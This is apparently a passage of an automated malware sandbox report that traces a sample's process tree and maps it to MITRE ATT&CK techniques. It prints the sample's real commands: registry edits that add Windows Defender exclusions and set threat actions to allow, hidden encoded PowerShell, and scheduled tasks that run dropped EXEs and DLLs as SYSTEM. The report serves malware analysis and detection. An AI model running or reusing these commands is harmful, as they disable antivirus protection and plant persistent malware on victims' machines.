                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IRHzkvLDUeVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IRHzkvLDUeVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XKjWasDVYJyYiNLLWrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XKjWasDVYJyYiNLLWrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kKKjXndmU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kKKjXndmU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\piyzCbdjiNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\piyzCbdjiNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pllIHQStAPFjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pllIHQStAPFjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MpMAUrXmjXArlGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MpMAUrXmjXArlGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGCIACfwpYHRvWVGx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGCIACfwpYHRvWVGx\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wVIgArRVXarkDMQH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wVIgArRVXarkDMQH\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                          2⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2420
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IRHzkvLDUeVU2" /t REG_DWORD /d 0 /reg:32
                                                                                                            3⤵
                                                                                                              PID:3116
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IRHzkvLDUeVU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                4⤵
                                                                                                                  PID:1300
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IRHzkvLDUeVU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:3788
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XKjWasDVYJyYiNLLWrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:1424
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XKjWasDVYJyYiNLLWrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:4712
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kKKjXndmU" /t REG_DWORD /d 0 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:516
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kKKjXndmU" /t REG_DWORD /d 0 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:4060
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piyzCbdjiNUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:3708
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\piyzCbdjiNUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:4336
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pllIHQStAPFjC" /t REG_DWORD /d 0 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:4292
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pllIHQStAPFjC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:1460
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MpMAUrXmjXArlGVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:1372
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MpMAUrXmjXArlGVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:4652
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:4972
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:5032
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGCIACfwpYHRvWVGx /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:4284
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGCIACfwpYHRvWVGx /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:2536
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wVIgArRVXarkDMQH /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:5112
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wVIgArRVXarkDMQH /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4560
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /CREATE /TN "gatwAypNW" /SC once /ST 04:52:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                2⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:4576
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /run /I /tn "gatwAypNW"
                                                                                                                                                2⤵
                                                                                                                                                  PID:2404
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /DELETE /F /TN "gatwAypNW"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4672
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "NTmGllrOJERUeFPrr" /SC once /ST 03:59:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wVIgArRVXarkDMQH\SSAgWBClzfToBRn\uIukXxS.exe\" RD /QfRididuw 385135 /S" /V1 /F
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:1884
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /run /I /tn "NTmGllrOJERUeFPrr"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2620
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 1168
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:508
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                    1⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:2200
                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3168
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4460
                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                        1⤵
                                                                                                                                                          PID:60
                                                                                                                                                        • \??\c:\windows\system32\gpscript.exe
                                                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2472
                                                                                                                                                          • C:\Windows\Temp\wVIgArRVXarkDMQH\SSAgWBClzfToBRn\uIukXxS.exe
                                                                                                                                                            C:\Windows\Temp\wVIgArRVXarkDMQH\SSAgWBClzfToBRn\uIukXxS.exe RD /QfRididuw 385135 /S
                                                                                                                                                            1⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:2452
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1260
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:1348
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2544
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:4528
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:676
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2444
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:3128
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3444
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:2248
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:3116
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4536
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:4848
                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:4196
                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3396
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:2188
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:2176
                                                                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:5112
                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                              schtasks /DELETE /F /TN "bgPWCzgNhfwtzRcEcq"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5016
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2880
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5008
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:4172
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:5104
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:2944
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\kKKjXndmU\fooBoq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zIKIZlegkKLumzZ" /V1 /F
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:3248
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "zIKIZlegkKLumzZ2" /F /xml "C:\Program Files (x86)\kKKjXndmU\OumWRFt.xml" /RU "SYSTEM"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:4692
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /END /TN "zIKIZlegkKLumzZ"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:1572
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "zIKIZlegkKLumzZ"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4220
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "ATTngKdabMAsev" /F /xml "C:\Program Files (x86)\IRHzkvLDUeVU2\hkZQkro.xml" /RU "SYSTEM"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                          PID:4244
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "vzfTrkdDwNAJl2" /F /xml "C:\ProgramData\MpMAUrXmjXArlGVB\EPeHNFu.xml" /RU "SYSTEM"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                          PID:4832
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "rSCtPBrhLfldwXrSR2" /F /xml "C:\Program Files (x86)\XKjWasDVYJyYiNLLWrR\fHWiXny.xml" /RU "SYSTEM"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                          PID:4464
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "ElPEKokRAhOoDydrDJF2" /F /xml "C:\Program Files (x86)\pllIHQStAPFjC\eUFXehf.xml" /RU "SYSTEM"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                          PID:3240
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "zpFILYQsznFvfINsS" /SC once /ST 04:54:46 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wVIgArRVXarkDMQH\qAyhKTPe\kIobYZE.dll\",#1 /PBodidmZG 385135" /V1 /F
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                          PID:3020
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /run /I /tn "zpFILYQsznFvfINsS"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4564
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "NTmGllrOJERUeFPrr"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4528
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 2080
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              PID:2256
                                                                                                                                                                                                          • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                            c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wVIgArRVXarkDMQH\qAyhKTPe\kIobYZE.dll",#1 /PBodidmZG 385135
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5028
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wVIgArRVXarkDMQH\qAyhKTPe\kIobYZE.dll",#1 /PBodidmZG 385135
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                PID:2052
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "zpFILYQsznFvfINsS"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:2248

                                                                                                                                                                                                              Network

                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                              Execution

                                                                                                                                                                                                              Command and Scripting Interpreter

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1059

                                                                                                                                                                                                              PowerShell

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1059.001

                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1053

                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1053.005

                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1053

                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                              1
